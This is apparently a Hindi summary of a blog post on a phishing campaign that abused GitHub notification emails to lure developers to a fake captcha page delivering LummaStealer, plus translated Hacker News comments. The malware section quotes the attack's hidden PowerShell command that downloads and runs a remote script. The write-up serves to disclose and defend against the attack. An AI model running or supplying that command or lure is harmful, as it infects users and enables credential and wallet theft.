GitHub नोटिफिकेशन ईमेल का दुरुपयोग कर malware वितरण की घटना

 (ianspence.com)
1 पॉइंट द्वारा GN⁺ 2024-09-20 | 1 टिप्पणियां | WhatsApp पर शेयर करें
  • एक open source डेवलपर के रूप में GitHub से अक्सर ईमेल मिलते हैं
  • इनमें से अधिकांश ईमेल ऐसे notification emails होते हैं जो GitHub users की interaction की जानकारी देते हैं
  • लेकिन कुछ ईमेल GitHub security का रूप धरकर malware डाउनलोड करवाते हैं

हमले का तरीका

  1. हमलावर अस्थायी GitHub account का उपयोग करके public repository में issue बनाता है
  2. हमलावर issue को जल्दी से delete कर देता है
  3. repository owner को notification email मिलता है
  4. वह ईमेल में दिए गए link पर क्लिक करता है
  5. निर्देशों का पालन करते हुए अपने system में malware संक्रमित कर लेता है

ईमेल संदेश का विश्लेषण

  • ईमेल की सामग्री का अधिकांश हिस्सा हमलावर नियंत्रित कर सकता है
  • ईमेल में यह नहीं बताया जाता कि कोई नया issue बनाया गया था
  • हमलावर "Github Security Team" बनकर सामने आता है
  • ईमेल GitHub से भेजा गया होता है, इसलिए phishing checks पार कर लेता है

GitHub में सुधार की गुंजाइश

  • ईमेल में अधिक संदर्भ दिया जाए तो हमले की प्रभावशीलता कम की जा सकती है
  • हमलावर द्वारा नियंत्रित content कम करना चाहिए और sender के बारे में स्पष्टता बढ़ानी चाहिए

वेबसाइट

  • ईमेल के link का पीछा करने पर captcha page पर ले जाया जाता है
  • captcha page उपयोगकर्ता को Windows Run box में command दर्ज करने के लिए उकसाता है

malware

  • साइट निम्न command को clipboard में कॉपी करती है: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • यह command PowerShell process शुरू करती है और script डाउनलोड करके चलाती है

malware के चरण

  1. PowerShell command के जरिए script डाउनलोड और execute की जाती है
  2. script malicious executable डाउनलोड करके चलाती है
  3. executable पर digital signature होता है, लेकिन वह valid नहीं होता
  4. Windows invalid signature पर warning नहीं देता

Windows की कमजोरी

  • इंटरनेट से डाउनलोड की गई files की पहचान करने वाला "Mark of the Web" (MOTW) flag सेट नहीं होता
  • .NET Framework की System.Net.WebClient class MOTW flag सेट नहीं करती
  • MOTW flag सेट न होने पर Windows invalid signature के लिए warning नहीं देता

malware विश्लेषण

  • malware memory में load होकर execute होता है
  • यह LummaStealer नाम का malware है, जो cryptocurrency wallets, saved credentials आदि चुरा लेता है

निष्कर्ष

  • यह GitHub notification emails की कमजोरी का दुरुपयोग करने वाले हमले का मामला है
  • विश्लेषण के लिए विभिन्न tools का उपयोग किया गया

GN⁺ का सार

  • यह लेख GitHub notification emails का दुरुपयोग करने वाले malware हमले के मामले को कवर करता है
  • GitHub की email system की कमजोरी का फायदा उठाकर malware वितरित किया गया
  • Windows के "Mark of the Web" flag और digital signature validation की कमजोरियों का उपयोग किया गया
  • LummaStealer नाम का malware इस्तेमाल किया गया
  • ये कमजोरियां GitHub और Microsoft को report की गई हैं
  • मिलती-जुलती functionality वाले अन्य projects में Cyfirma की analysis सामग्री की सिफारिश की गई है

संबंधित पढ़ाई

1 टिप्पणियां

 
GN⁺ 2024-09-20
Hacker News राय

  • हाल ही में PayPal से एक बहुत ही विश्वसनीय लगने वाला ईमेल मिला

    • किसी ने quote फीचर का उपयोग करके कंपनी का नाम "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...." सेट कर दिया था
    • ईमेल वास्तव में PayPal.com से आया था, और यह समझ से बाहर है कि वे ऐसे user names को मैनेज नहीं करते
    • मैंने इसकी रिपोर्ट की, लेकिन अभी तक कोई जवाब नहीं मिला
    • ईमेल को इस तरह फ़ॉर्मैट किया गया था कि वह असली PayPal ईमेल जैसा लगे, इसलिए लगता है बहुत से लोग धोखा खा जाएंगे

  • सोचता हूँ क्या लोग सच में ऐसे scam में फँस जाते हैं

    • मान लेते हैं कि आपको पता है कि ईमेल github से आया है
    • पहला red flag: ईमेल एक असली domain के बदले उसके variation पर लिंक करता है
    • दूसरा red flag: captcha आपसे shell command टाइप करने को कहता है

  • लगता है junior developers ऐसे scam में फँस सकते हैं

    • "ओह, code चलाकर captcha solve करना, कितना दिलचस्प है!"

  • वेबपेज को सिर्फ क्लिक से copy/paste buffer भर पाने में सक्षम नहीं होना चाहिए

    • ईमेल के लिंक पर क्लिक नहीं करना चाहिए और न ही ईमेल की सामग्री पर भरोसा करना चाहिए
    • समस्या यह है कि Windows अब भी एक लाइन के PowerShell command से root permissions दे देता है

  • Github को automated services के लिए issue में बिना जाँच के लिंक डालने से रोकना चाहिए

    • Github को ईमेल से भेजी जाने वाली सामग्री को बेहतर तरीके से नियंत्रित करना चाहिए

  • सोच रहा हूँ कि github-scanner.com अब भी malicious party है या नहीं

    • Cloudflare DNS host कर रहा है, और इस समस्या की रिपोर्ट करने का कोई तरीका नहीं है

  • हमलावर ने issue जल्दी हटा दिया

    • केवल admin ही issue हटा सकता है
    • इसलिए repository में issue के निशान बचे हुए हैं

  • अच्छा लेख है, Julia Evans के ब्लॉग जैसा अहसास देता है

  • यह दुखद है कि 2024 में भी लोग अब भी सबसे आसान trick में फँस जाते हैं

  • आज सुबह मुझे भी ऐसी notification मिली थी और मैंने उसे नज़रअंदाज़ कर दिया

    • notification किसी खास repository के बारे में थी

  • पढ़ने लायक है, यह दिखाता है कि वे क्या करने की कोशिश कर रहे हैं

    • सिर्फ लिंक से ही शक हो सकता है, लेकिन किसी को इसे गहराई से खंगालते देखना रोचक है

  • मुझे भी ऐसा ही GitHub notification ईमेल मिला

    • उसमें कहा गया था कि repository में vulnerability मिली है, लेकिन मैंने क्लिक नहीं किया
    • मैं आलसी programmer हूँ, इसलिए क्लिक नहीं किया